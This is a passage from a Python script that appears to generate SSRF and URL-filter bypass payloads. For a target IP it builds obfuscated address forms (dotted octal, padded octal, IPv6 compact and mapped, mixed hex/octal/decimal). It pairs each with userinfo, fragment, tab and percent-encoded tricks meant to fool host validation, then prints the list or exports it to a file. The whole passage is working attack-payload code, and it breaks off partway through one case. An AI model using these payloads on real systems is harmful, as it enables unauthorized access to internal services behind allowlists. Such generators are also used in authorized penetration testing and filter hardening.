print(bluecolor,"Dotted octal IP Address of:",resetcolor,yellowcolor," http://",arg1,resetcolor,bluecolor," + authentication prefix/bypass combo list",resetcolor,sep='')
|
||||||
|
print(greencolor,'=========================================================================================================================================',resetcolor,sep='')
|
||||||
|
IP5 = OCT_SINGLE(ipFrag3) + "." + OCT_SINGLE(ipFrag2) + "." + OCT_SINGLE(ipFrag1) + "." + OCT_SINGLE(ipFrag0)
|
||||||
|
print('http://',IP5,':',PORT,'/',sep='')
|
||||||
|
print('http://',IP5,':',PORT,'?@',RANDOMPREFIXVALIDSITE,'/',sep='')
|
||||||
|
print('http://',IP5,':',PORT,'#@',RANDOMPREFIXVALIDSITE,'/',sep='')
|
||||||
|
print('http://',RANDOMPREFIXVALIDSITE,'@',IP5,':',PORT,'/',sep='')
|
||||||
|
print('http://',RANDPREFIXTEXT,'@',IP5,':',PORT,'/',sep='')
|
||||||
|
print('http://',RANDPREFIXTEXTSPEC,'@',IP5,':',PORT,'/',sep='')
|
||||||
|
print('http://',RANDPREFIXTEXT,'@',IP5,':',PORT,'@',RANDOMPREFIXVALIDSITE,'/',sep='')
|
||||||
|
print('http://',RANDPREFIXTEXTSPEC,'@',IP5,':','@',RANDOMPREFIXVALIDSITE,'/',sep='')
|
||||||
|
print('http://',RANDPREFIXTEXT,'@',IP5,':',PORT,'+@',RANDOMPREFIXVALIDSITE,'/',sep='')
|
||||||
|
print('http://',RANDPREFIXTEXTSPEC,'@',IP5,':','+@',RANDOMPREFIXVALIDSITE,'/',sep='')
|
||||||
|
print('http://',RANDPREFIXTEXT,'@',RANDOMPREFIXVALIDSITE,'@',IP5,':',PORT,'/',sep='')
|
||||||
|
print('http://',RANDPREFIXTEXTSPEC,'@',RANDOMPREFIXVALIDSITE,'@',IP5,':',PORT,'/',sep='')
|
||||||
|
print('http://',IP5,':',PORT,'+&@',RANDOMPREFIXVALIDSITE,'#+@',RANDOMPREFIXVALIDSITE,'/',sep='')
|
||||||
|
print('http://',RANDOMPREFIXVALIDSITE,'+&@',IP5,':',PORT,'#+@',RANDOMPREFIXVALIDSITE,'/',sep='')
|
||||||
|
print('http://',RANDOMPREFIXVALIDSITE,'+&@',RANDOMPREFIXVALIDSITE,'#+@',IP5,':',PORT,'/',sep='')
|
||||||
|
print('http://',IP5,':',PORT,':80','/',sep='')
|
||||||
|
print('http://',IP5,':',PORT,'\\t',RANDOMPREFIXVALIDSITE,'/',sep='')
|
||||||
|
print('http://',IP5,':',PORT,'%09',RANDOMPREFIXVALIDSITE,'/',sep='')
|
||||||
|
print('http://',IP5,':',PORT,'%2509',RANDOMPREFIXVALIDSITE,'/',sep='')
|
||||||
|
print(greencolor,'=========================================================================================================================================',resetcolor,sep='')
|
||||||
|
print("\n",sep='')
|
||||||
|
if EXPORTRESULTS == 'export':
|
||||||
|
print('http://',IP5,':',PORT,'/',file=f,sep='')
|
||||||
|
print('http://',IP5,':',PORT,'?@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
|
||||||
|
print('http://',IP5,':',PORT,'#@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
|
||||||
|
print('http://',RANDOMPREFIXVALIDSITE,'@',IP5,':',PORT,'/',file=f,sep='')
|
||||||
|
print('http://',RANDPREFIXTEXT,'@',IP5,':',PORT,'/',file=f,sep='')
|
||||||
|
print('http://',RANDPREFIXTEXTSPEC,'@',IP5,':',PORT,'/',file=f,sep='')
|
||||||
|
print('http://',RANDPREFIXTEXT,'@',IP5,':',PORT,'@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
|
||||||
|
print('http://',RANDPREFIXTEXTSPEC,'@',IP5,':','@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
|
||||||
|
print('http://',RANDPREFIXTEXT,'@',IP5,':',PORT,'+@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
|
||||||
|
print('http://',RANDPREFIXTEXTSPEC,'@',IP5,':','+@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
|
||||||
|
print('http://',RANDPREFIXTEXT,'@',RANDOMPREFIXVALIDSITE,'@',IP5,':',PORT,'/',file=f,sep='')
|
||||||
|
print('http://',RANDPREFIXTEXTSPEC,'@',RANDOMPREFIXVALIDSITE,'@',IP5,':',PORT,'/',file=f,sep='')
|
||||||
|
print('http://',IP5,':',PORT,'+&@',RANDOMPREFIXVALIDSITE,'#+@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
|
||||||
|
print('http://',RANDOMPREFIXVALIDSITE,'+&@',IP5,':',PORT,'#+@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
|
||||||
|
print('http://',RANDOMPREFIXVALIDSITE,'+&@',RANDOMPREFIXVALIDSITE,'#+@',IP5,':',PORT,'/',file=f,sep='')
|
||||||
|
print('http://',IP5,':',PORT,':80','/',file=f,sep='')
|
||||||
|
print('http://',IP5,':',PORT,'\\t',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
|
||||||
|
print('http://',IP5,':',PORT,'%09',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
|
||||||
|
print('http://',IP5,':',PORT,'%2509',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
|
||||||
|
|
||||||
|
#Case 6 - Dotted octal with padding
|
||||||
|
print(bluecolor,"Dotted octal with padding IP Address of:",resetcolor,yellowcolor," http://",arg1,resetcolor,bluecolor," + authentication prefix/bypass combo list",resetcolor,sep='')
|
||||||
|
print(greencolor,'=========================================================================================================================================',resetcolor,sep='')
|
||||||
|
IP6 = '0' + OCT_SINGLE(ipFrag3) + "." + '00' + OCT_SINGLE(ipFrag2) + "." + '000' + OCT_SINGLE(ipFrag1) + "." + '0000' + OCT_SINGLE(ipFrag0)
|
||||||
|
print('http://',IP6,':',PORT,'/',sep='')
|
||||||
|
print('http://',IP6,':',PORT,'?@',RANDOMPREFIXVALIDSITE,'/',sep='')
|
||||||
|
print('http://',IP6,':',PORT,'#@',RANDOMPREFIXVALIDSITE,'/',sep='')
|
||||||
|
print('http://',RANDOMPREFIXVALIDSITE,'@',IP6,':',PORT,'/',sep='')
|
||||||
|
print('http://',RANDPREFIXTEXTSPEC,'@',IP6,':',PORT,'/',sep='')
|
||||||
|
print('http://',RANDPREFIXTEXT,'@',IP6,':',PORT,'/',sep='')
|
||||||
|
print('http://',RANDPREFIXTEXT,'@',IP6,':',PORT,'@',RANDOMPREFIXVALIDSITE,'/',sep='')
|
||||||
|
print('http://',RANDPREFIXTEXTSPEC,'@',IP6,':','@',RANDOMPREFIXVALIDSITE,'/',sep='')
|
||||||
|
print('http://',RANDPREFIXTEXT,'@',IP6,':',PORT,'+@',RANDOMPREFIXVALIDSITE,'/',sep='')
|
||||||
|
print('http://',RANDPREFIXTEXTSPEC,'@',IP6,':','+@',RANDOMPREFIXVALIDSITE,'/',sep='')
|
||||||
|
print('http://',RANDPREFIXTEXT,'@',RANDOMPREFIXVALIDSITE,'@',IP6,':',PORT,'/',sep='')
|
||||||
|
print('http://',RANDPREFIXTEXTSPEC,'@',RANDOMPREFIXVALIDSITE,'@',IP6,':',PORT,'/',sep='')
|
||||||
|
print('http://',IP6,':',PORT,'+&@',RANDOMPREFIXVALIDSITE,'#+@',RANDOMPREFIXVALIDSITE,'/',sep='')
|
||||||
|
print('http://',RANDOMPREFIXVALIDSITE,'+&@',IP6,':',PORT,'#+@',RANDOMPREFIXVALIDSITE,'/',sep='')
|
||||||
|
print('http://',RANDOMPREFIXVALIDSITE,'+&@',RANDOMPREFIXVALIDSITE,'#+@',IP6,':',PORT,'/',sep='')
|
||||||
|
print('http://',IP6,':',PORT,':80','/',sep='')
|
||||||
|
print('http://',IP6,':',PORT,'\\t',RANDOMPREFIXVALIDSITE,'/',sep='')
|
||||||
|
print('http://',IP6,':',PORT,'%09',RANDOMPREFIXVALIDSITE,'/',sep='')
|
||||||
|
print('http://',IP6,':',PORT,'%2509',RANDOMPREFIXVALIDSITE,'/',sep='')
|
||||||
|
print(greencolor,'=========================================================================================================================================',resetcolor,sep='')
|
||||||
|
print("\n",sep='')
|
||||||
|
if EXPORTRESULTS == 'export':
|
||||||
|
print('http://',IP6,':',PORT,'/',file=f,sep='')
|
||||||
|
print('http://',IP6,':',PORT,'?@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
|
||||||
|
print('http://',IP6,':',PORT,'#@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
|
||||||
|
print('http://',RANDOMPREFIXVALIDSITE,'@',IP6,':',PORT,'/',file=f,sep='')
|
||||||
|
print('http://',RANDPREFIXTEXT,'@',IP6,':',PORT,'/',file=f,sep='')
|
||||||
|
print('http://',RANDPREFIXTEXTSPEC,'@',IP6,':',PORT,'/',file=f,sep='')
|
||||||
|
print('http://',RANDPREFIXTEXT,'@',IP6,':',PORT,'@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
|
||||||
|
print('http://',RANDPREFIXTEXTSPEC,'@',IP6,':','@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
|
||||||
|
print('http://',RANDPREFIXTEXT,'@',IP6,':',PORT,'+@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
|
||||||
|
print('http://',RANDPREFIXTEXTSPEC,'@',IP6,':','+@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
|
||||||
|
print('http://',RANDPREFIXTEXT,'@',RANDOMPREFIXVALIDSITE,'@',IP6,':',PORT,'/',file=f,sep='')
|
||||||
|
print('http://',RANDPREFIXTEXTSPEC,'@',RANDOMPREFIXVALIDSITE,'@',IP6,':',PORT,'/',file=f,sep='')
|
||||||
|
print('http://',IP6,':',PORT,'+&@',RANDOMPREFIXVALIDSITE,'#+@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
|
||||||
|
print('http://',RANDOMPREFIXVALIDSITE,'+&@',IP6,':',PORT,'#+@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
|
||||||
|
print('http://',RANDOMPREFIXVALIDSITE,'+&@',RANDOMPREFIXVALIDSITE,'#+@',IP6,':',PORT,'/',file=f,sep='')
|
||||||
|
print('http://',IP6,':',PORT,':80','/',file=f,sep='')
|
||||||
|
print('http://',IP6,':',PORT,'\\t',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
|
||||||
|
print('http://',IP6,':',PORT,'%09',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
|
||||||
|
print('http://',IP6,':',PORT,'%2509',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
|
||||||
|
|
||||||
|
#Case 7 - IPv6 compact version
|
||||||
|
print(bluecolor,"IPv6 compact version IP Address of:",resetcolor,yellowcolor," http://",arg1,resetcolor,bluecolor," + authentication prefix/bypass combo list",resetcolor,sep='')
|
||||||
|
print(greencolor,'=========================================================================================================================================',resetcolor,sep='')
|
||||||
|
IP7 = '[::' + ipFrag3 + "." + ipFrag2 + "." + ipFrag1 + "." + ipFrag0 + ']'
|
||||||
|
print('http://',IP7,':',PORT,'/',sep='')
|
||||||
|
print('http://',IP7,':',PORT,'?@',RANDOMPREFIXVALIDSITE,'/',sep='')
|
||||||
|
print('http://',IP7,':',PORT,'#@',RANDOMPREFIXVALIDSITE,'/',sep='')
|
||||||
|
print('http://',RANDOMPREFIXVALIDSITE,'@',IP7,':',PORT,'/',sep='')
|
||||||
|
print('http://',RANDPREFIXTEXTSPEC,'@',IP7,':',PORT,'/',sep='')
|
||||||
|
print('http://',RANDPREFIXTEXT,'@',IP7,':',PORT,'/',sep='')
|
||||||
|
print('http://',RANDPREFIXTEXT,'@',IP7,':',PORT,'@',RANDOMPREFIXVALIDSITE,'/',sep='')
|
||||||
|
print('http://',RANDPREFIXTEXTSPEC,'@',IP7,':','@',RANDOMPREFIXVALIDSITE,'/',sep='')
|
||||||
|
print('http://',RANDPREFIXTEXT,'@',IP7,':',PORT,'+@',RANDOMPREFIXVALIDSITE,'/',sep='')
|
||||||
|
print('http://',RANDPREFIXTEXTSPEC,'@',IP7,':','+@',RANDOMPREFIXVALIDSITE,'/',sep='')
|
||||||
|
print('http://',RANDPREFIXTEXT,'@',RANDOMPREFIXVALIDSITE,'@',IP7,':',PORT,'/',sep='')
|
||||||
|
print('http://',RANDPREFIXTEXTSPEC,'@',RANDOMPREFIXVALIDSITE,'@',IP7,':',PORT,'/',sep='')
|
||||||
|
print('http://',IP7,':',PORT,'+&@',RANDOMPREFIXVALIDSITE,'#+@',RANDOMPREFIXVALIDSITE,'/',sep='')
|
||||||
|
print('http://',RANDOMPREFIXVALIDSITE,'+&@',IP7,':',PORT,'#+@',RANDOMPREFIXVALIDSITE,'/',sep='')
|
||||||
|
print('http://',RANDOMPREFIXVALIDSITE,'+&@',RANDOMPREFIXVALIDSITE,'#+@',IP7,':',PORT,'/',sep='')
|
||||||
|
print('http://',IP7,':',PORT,':80','/',sep='')
|
||||||
|
print('http://',IP7,':',PORT,'\\t',RANDOMPREFIXVALIDSITE,'/',sep='')
|
||||||
|
print('http://',IP7,':',PORT,'%09',RANDOMPREFIXVALIDSITE,'/',sep='')
|
||||||
|
print('http://',IP7,':',PORT,'%2509',RANDOMPREFIXVALIDSITE,'/',sep='')
|
||||||
|
print(greencolor,'=========================================================================================================================================',resetcolor,sep='')
|
||||||
|
print("\n",sep='')
|
||||||
|
if EXPORTRESULTS == 'export':
|
||||||
|
print('http://',IP7,':',PORT,'/',file=f,sep='')
|
||||||
|
print('http://',IP7,':',PORT,'?@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
|
||||||
|
print('http://',IP7,':',PORT,'#@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
|
||||||
|
print('http://',RANDOMPREFIXVALIDSITE,'@',IP7,':',PORT,'/',file=f,sep='')
|
||||||
|
print('http://',RANDPREFIXTEXT,'@',IP7,':',PORT,'/',file=f,sep='')
|
||||||
|
print('http://',RANDPREFIXTEXTSPEC,'@',IP7,':',PORT,'/',file=f,sep='')
|
||||||
|
print('http://',RANDPREFIXTEXT,'@',IP7,':',PORT,'@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
|
||||||
|
print('http://',RANDPREFIXTEXTSPEC,'@',IP7,':','@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
|
||||||
|
print('http://',RANDPREFIXTEXT,'@',IP7,':',PORT,'+@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
|
||||||
|
print('http://',RANDPREFIXTEXTSPEC,'@',IP7,':','+@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
|
||||||
|
print('http://',RANDPREFIXTEXT,'@',RANDOMPREFIXVALIDSITE,'@',IP7,':',PORT,'/',file=f,sep='')
|
||||||
|
print('http://',RANDPREFIXTEXTSPEC,'@',RANDOMPREFIXVALIDSITE,'@',IP7,':',PORT,'/',file=f,sep='')
|
||||||
|
print('http://',IP7,':',PORT,'+&@',RANDOMPREFIXVALIDSITE,'#+@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
|
||||||
|
print('http://',RANDOMPREFIXVALIDSITE,'+&@',IP7,':',PORT,'#+@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
|
||||||
|
print('http://',RANDOMPREFIXVALIDSITE,'+&@',RANDOMPREFIXVALIDSITE,'#+@',IP7,':',PORT,'/',file=f,sep='')
|
||||||
|
print('http://',IP7,':',PORT,':80','/',file=f,sep='')
|
||||||
|
print('http://',IP7,':',PORT,'\\t',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
|
||||||
|
print('http://',IP7,':',PORT,'%09',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
|
||||||
|
print('http://',IP7,':',PORT,'%2509',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
|
||||||
|
|
||||||
|
#Case 8 - IPv6 mapped version
|
||||||
|
print(bluecolor,"IPv6 mapped version IP Address of:",resetcolor,yellowcolor," http://",arg1,resetcolor,bluecolor," + authentication prefix/bypass combo list",resetcolor,sep='')
|
||||||
|
print(greencolor,'=========================================================================================================================================',resetcolor,sep='')
|
||||||
|
IP8 = '[::ffff:' + ipFrag3 + "." + ipFrag2 + "." + ipFrag1 + "." + ipFrag0 + ']'
|
||||||
|
print('http://',IP8,':',PORT,'/',sep='')
|
||||||
|
print('http://',IP8,':',PORT,'?@',RANDOMPREFIXVALIDSITE,'/',sep='')
|
||||||
|
print('http://',IP8,':',PORT,'#@',RANDOMPREFIXVALIDSITE,'/',sep='')
|
||||||
|
print('http://',RANDOMPREFIXVALIDSITE,'@',IP8,':',PORT,'/',sep='')
|
||||||
|
print('http://',RANDPREFIXTEXTSPEC,'@',IP8,':',PORT,'/',sep='')
|
||||||
|
print('http://',RANDPREFIXTEXT,'@',IP8,':',PORT,'/',sep='')
|
||||||
|
print('http://',RANDPREFIXTEXT,'@',IP8,':',PORT,'@',RANDOMPREFIXVALIDSITE,'/',sep='')
|
||||||
|
print('http://',RANDPREFIXTEXTSPEC,'@',IP8,':','@',RANDOMPREFIXVALIDSITE,'/',sep='')
|
||||||
|
print('http://',RANDPREFIXTEXT,'@',IP8,':',PORT,'+@',RANDOMPREFIXVALIDSITE,'/',sep='')
|
||||||
|
print('http://',RANDPREFIXTEXTSPEC,'@',IP8,':','+@',RANDOMPREFIXVALIDSITE,'/',sep='')
|
||||||
|
print('http://',RANDPREFIXTEXT,'@',RANDOMPREFIXVALIDSITE,'@',IP8,':',PORT,'/',sep='')
|
||||||
|
print('http://',RANDPREFIXTEXTSPEC,'@',RANDOMPREFIXVALIDSITE,'@',IP8,':',PORT,'/',sep='')
|
||||||
|
print('http://',IP8,':',PORT,'+&@',RANDOMPREFIXVALIDSITE,'#+@',RANDOMPREFIXVALIDSITE,'/',sep='')
|
||||||
|
print('http://',RANDOMPREFIXVALIDSITE,'+&@',IP8,':',PORT,'#+@',RANDOMPREFIXVALIDSITE,'/',sep='')
|
||||||
|
print('http://',RANDOMPREFIXVALIDSITE,'+&@',RANDOMPREFIXVALIDSITE,'#+@',IP8,':',PORT,'/',sep='')
|
||||||
|
print('http://',IP8,':',PORT,':80','/',sep='')
|
||||||
|
print('http://',IP8,':',PORT,'\\t',RANDOMPREFIXVALIDSITE,'/',sep='')
|
||||||
|
print('http://',IP8,':',PORT,'%09',RANDOMPREFIXVALIDSITE,'/',sep='')
|
||||||
|
print('http://',IP8,':',PORT,'%2509',RANDOMPREFIXVALIDSITE,'/',sep='')
|
||||||
|
print(greencolor,'=========================================================================================================================================',resetcolor,sep='')
|
||||||
|
print("\n",sep='')
|
||||||
|
if EXPORTRESULTS == 'export':
|
||||||
|
print('http://',IP8,':',PORT,'/',file=f,sep='')
|
||||||
|
print('http://',IP8,':',PORT,'?@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
|
||||||
|
print('http://',IP8,':',PORT,'#@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
|
||||||
|
print('http://',RANDOMPREFIXVALIDSITE,'@',IP8,':',PORT,'/',file=f,sep='')
|
||||||
|
print('http://',RANDPREFIXTEXT,'@',IP8,':',PORT,'/',file=f,sep='')
|
||||||
|
print('http://',RANDPREFIXTEXTSPEC,'@',IP8,':',PORT,'/',file=f,sep='')
|
||||||
|
print('http://',RANDPREFIXTEXT,'@',IP8,':',PORT,'@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
|
||||||
|
print('http://',RANDPREFIXTEXTSPEC,'@',IP8,':','@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
|
||||||
|
print('http://',RANDPREFIXTEXT,'@',IP8,':',PORT,'+@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
|
||||||
|
print('http://',RANDPREFIXTEXTSPEC,'@',IP8,':','+@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
|
||||||
|
print('http://',RANDPREFIXTEXT,'@',RANDOMPREFIXVALIDSITE,'@',IP8,':',PORT,'/',file=f,sep='')
|
||||||
|
print('http://',RANDPREFIXTEXTSPEC,'@',RANDOMPREFIXVALIDSITE,'@',IP8,':',PORT,'/',file=f,sep='')
|
||||||
|
print('http://',IP8,':',PORT,'+&@',RANDOMPREFIXVALIDSITE,'#+@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
|
||||||
|
print('http://',RANDOMPREFIXVALIDSITE,'+&@',IP8,':',PORT,'#+@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
|
||||||
|
print('http://',RANDOMPREFIXVALIDSITE,'+&@',RANDOMPREFIXVALIDSITE,'#+@',IP8,':',PORT,'/',file=f,sep='')
|
||||||
|
print('http://',IP8,':',PORT,':80','/',file=f,sep='')
|
||||||
|
print('http://',IP8,':',PORT,'\\t',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
|
||||||
|
print('http://',IP8,':',PORT,'%09',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
|
||||||
|
print('http://',IP8,':',PORT,'%2509',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
|
||||||
|
|
||||||
|
#Case 9 - Dotted hexadecimal + Dotted octal + Dotless decimal
|
||||||
|
print(bluecolor,"Dotted hexadecimal + Dotted octal + Dotless decimal IP Address of:",resetcolor,yellowcolor," http://",arg1,resetcolor,bluecolor," + authentication prefix/bypass combo list",resetcolor,sep='')
|
||||||
|
print(greencolor,'=========================================================================================================================================',resetcolor,sep='')
|
||||||
|
IP9 = HEX_SINGLE(ipFrag3,"yes") + "." + OCT_SINGLE(ipFrag2) + "." + str(DECIMAL_SINGLE(ipFrag1,1) + DECIMAL_SINGLE(ipFrag0,0))
|
||||||
|
print('http://',IP9,':',PORT,'/',sep='')
|
||||||
|
print('http://',IP9,':',PORT,'?@',RANDOMPREFIXVALIDSITE,'/',sep='')
|
||||||
|
print('http://',IP9,':',PORT,'#@',RANDOMPREFIXVALIDSITE,'/',sep='')
|
||||||
|
print('http://',RANDOMPREFIXVALIDSITE,'@',IP9,':',PORT,'/',sep='')
|
||||||
|
print('http://',RANDPREFIXTEXTSPEC,'@',IP9,':',PORT,'/',sep='')
|
||||||
|
print('http://',RANDPREFIXTEXT,'@',IP9,':',PORT,'/',sep='')
|
||||||
|
print('http://',RANDPREFIXTEXT,'@',IP9,':',PORT,'@',RANDOMPREFIXVALIDSITE,'/',sep='')
|
||||||
|
print('http://',RANDPREFIXTEXTSPEC,'@',IP9,':','@',RANDOMPREFIXVALIDSITE,'/',sep='')
|
||||||
|
print('http://',RANDPREFIXTEXT,'@',IP9,':',PORT,'+@',RANDOMPREFIXVALIDSITE,'/',sep='')
|
||||||
|
print('http://',RANDPREFIXTEXTSPEC,'@',IP9,':','+@',RANDOMPREFIXVALIDSITE,'/',sep='')
|
||||||
|
print('http://',RANDPREFIXTEXT,'@',RANDOMPREFIXVALIDSITE,'@',IP9,':',PORT,'/',sep='')
|
||||||
|
print('http://',RANDPREFIXTEXTSPEC,'@',RANDOMPREFIXVALIDSITE,'@',IP9,':',PORT,'/',sep='')
|
||||||
|
print('http://',IP9,':',PORT,'+&@',RANDOMPREFIXVALIDSITE,'#+@',RANDOMPREFIXVALIDSITE,'/',sep='')
|
||||||
|
print('http://',RANDOMPREFIXVALIDSITE,'+&@',IP9,':',PORT,'#+@',RANDOMPREFIXVALIDSITE,'/',sep='')
|
||||||
|
print('http://',RANDOMPREFIXVALIDSITE,'+&@',RANDOMPREFIXVALIDSITE,'#+@',IP9,':',PORT,'/',sep='')
|
||||||
|
print('http://',IP9,':',PORT,':80','/',sep='')
|
||||||
|
print('http://',IP9,':',PORT,'\\t',RANDOMPREFIXVALIDSITE,'/',sep='')
|
||||||
|
print('http://',IP9,':',PORT,'%09',RANDOMPREFIXVALIDSITE,'/',sep='')
|
||||||
|
print('http://',IP9,':',PORT,'%2509',RANDOMPREFIXVALIDSITE,'/',sep='')
|
||||||
|
print(greencolor,'=========================================================================================================================================',resetcolor,sep='')
|
||||||
|
print("\n",sep='')
|
||||||
|
if EXPORTRESULTS == 'export':
|
||||||
|
print('http://',IP9,':',PORT,'/',file=f,sep='')
|
||||||
|
print('http://',IP9,':',PORT,'?@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
|
||||||
|
print('http://',IP9,':',PORT,'#@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
|
||||||
|
print('http://',RANDOMPREFIXVALIDSITE,'@',IP9,':',PORT,'/',file=f,sep='')
|
||||||
|
print('http://',RANDPREFIXTEXT,'@',IP9,':',PORT,'/',file=f,sep='')
|
||||||
|
print('http://',RANDPREFIXTEXTSPEC,'@',IP9,':',PORT,'/',file=f,sep='')
|
||||||
|
print('http://',RANDPREFIXTEXT,'@',IP9,':',PORT,'@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
|
||||||
|
print('http://',RANDPREFIXTEXTSPEC,'@',IP9,':','@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
|
||||||
|
print('http://',RANDPREFIXTEXT,'@',IP9,':',PORT,'+@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
|
||||||
|
print('http://',RANDPREFIXTEXTSPEC,'@',IP9,':','+@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
|
||||||
|
print('http://',RANDPREFIXTEXT,'@',RANDOMPREFIXVALIDSITE,'@',IP9,':',PORT,'/',file=f,sep='')
|
||||||
|
print('http://',RANDPREFIXTEXTSPEC,'@',RANDOMPREFIXVALIDSITE,'@',IP9,':',PORT,'/',file=f,sep='')
|
||||||
|
print('http://',IP9,':',PORT,'+&@',RANDOMPREFIXVALIDSITE,'#+@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
|
||||||
|
print('http://',RANDOMPREFIXVALIDSITE,'+&@',IP9,':',PORT,'#+@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
|
||||||
|
print('http://',RANDOMPREFIXVALIDSITE,'+&@',RANDOMPREFIXVALIDSITE,'#+@',IP9,':',PORT,'/',file=f,sep='')
|
||||||
|
print('http://',IP9,':',PORT,':80','/',file=f,sep='')
|
||||||
|
print('http://',IP9,':',PORT,'\\t',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
|
||||||
|
print('http://',IP9,':',PORT,'%09',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
|
||||||
|
print('http://',IP9,':',PORT,'%2509',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
|
||||||
|
|
||||||
|
#Case 10 - Dotted hexadecimal + Dotless decimal
|
||||||
|
print(bluecolor,"Dotted hexadecimal + Dotless decimal IP Address of:",resetcolor,yellowcolor," http://",arg1,resetcolor,bluecolor," + authentication prefix/bypass combo list",resetcolor,sep='')
|
||||||
|
print(greencolor,'=========================================================================================================================================',resetcolor,sep='')
|
||||||
|
IP10 = HEX_SINGLE(ipFrag3,"yes") + "." + str(DECIMAL_SINGLE(ipFrag2,2) + DECIMAL_SINGLE(ipFrag1,1) + DECIMAL_SINGLE(ipFrag0,0))
|
||||||
|
print('http://',IP10,':',PORT,'/',sep='')
|
||||||
|
print('http://',IP10,':',PORT,'?@',RANDOMPREFIXVALIDSITE,'/',sep='')
|
||||||
|
print('http://',IP10,':',PORT,'#@',RANDOMPREFIXVALIDSITE,'/',sep='')
|
||||||
|
print('http://',RANDOMPREFIXVALIDSITE,'@',IP10,':',PORT,'/',sep='')
|
||||||
|
print('http://',RANDPREFIXTEXTSPEC,'@',IP10,':',PORT,'/',sep='')
|
||||||
|
print('http://',RANDPREFIXTEXT,'@',IP10,':',PORT,'/',sep='')
|
||||||
|
print('http://',RANDPREFIXTEXT,'@',IP10,':',PORT,'@',RANDOMPREFIXVALIDSITE,'/',sep='')
|
||||||
|
print('http://',RANDPREFIXTEXTSPEC,'@',IP10,':','@',RANDOMPREFIXVALIDSITE,'/',sep='')
|
||||||
|
print('http://',RANDPREFIXTEXT,'@',IP10,':',PORT,'+@',RANDOMPREFIXVALIDSITE,'/',sep='')
|
||||||
|
print('http://',RANDPREFIXTEXTSPEC,'@',IP10,':','+@',RANDOMPREFIXVALIDSITE,'/',sep='')
|
||||||
|
print('http://',RANDPREFIXTEXT,'@',RANDOMPREFIXVALIDSITE,'@',IP10,':',PORT,'/',sep='')
|
||||||
|
print('http://',RANDPREFIXTEXTSPEC,'@',RANDOMPREFIXVALIDSITE,'@',IP10,':',PORT,'/',sep='')
|
||||||
|
print('http://',IP10,':',PORT,'+&@',RANDOMPREFIXVALIDSITE,'#+@',RANDOMPREFIXVALIDSITE,'/',sep='')
|
||||||
|
print('http://',RANDOMPREFIXVALIDSITE,'+&@',IP10,':',PORT,'#+@',RANDOMPREFIXVALIDSITE,'/',sep='')
|
||||||
|
print('http://',RANDOMPREFIXVALIDSITE,'+&@',RANDOMPREFIXVALIDSITE,'#+@',IP10,':',PORT,'/',sep='')
|
||||||
|
print('http://',IP10,':',PORT,':80','/',sep='')
|
||||||
|
print('http://',IP10,':',PORT,'\\t',RANDOMPREFIXVALIDSITE,'/',sep='')
|
||||||
|
print('http://',IP10,':',PORT,'%09',RANDOMPREFIXVALIDSITE,'/',sep='')
|
||||||
|
print('http://',IP10,':',PORT,'%2509',RANDOMPREFIXVALIDSITE,'/',sep='')
|
||||||
|
print(greencolor,'=========================================================================================================================================',resetcolor,sep='')
|
||||||
|
print("\n",sep='')
|
||||||
|
if EXPORTRESULTS == 'export':
|
||||||
|
print('http://',IP10,':',PORT,'/',file=f,sep='')
|
||||||
|
print('http://',IP10,':',PORT,'?@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
|
||||||
|
print('http://',IP10,':',PORT,'#@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
|
||||||
|
print('http://',RANDOMPREFIXVALIDSITE,'@',IP10,':',PORT,'/',file=f,sep='')
|
||||||
|
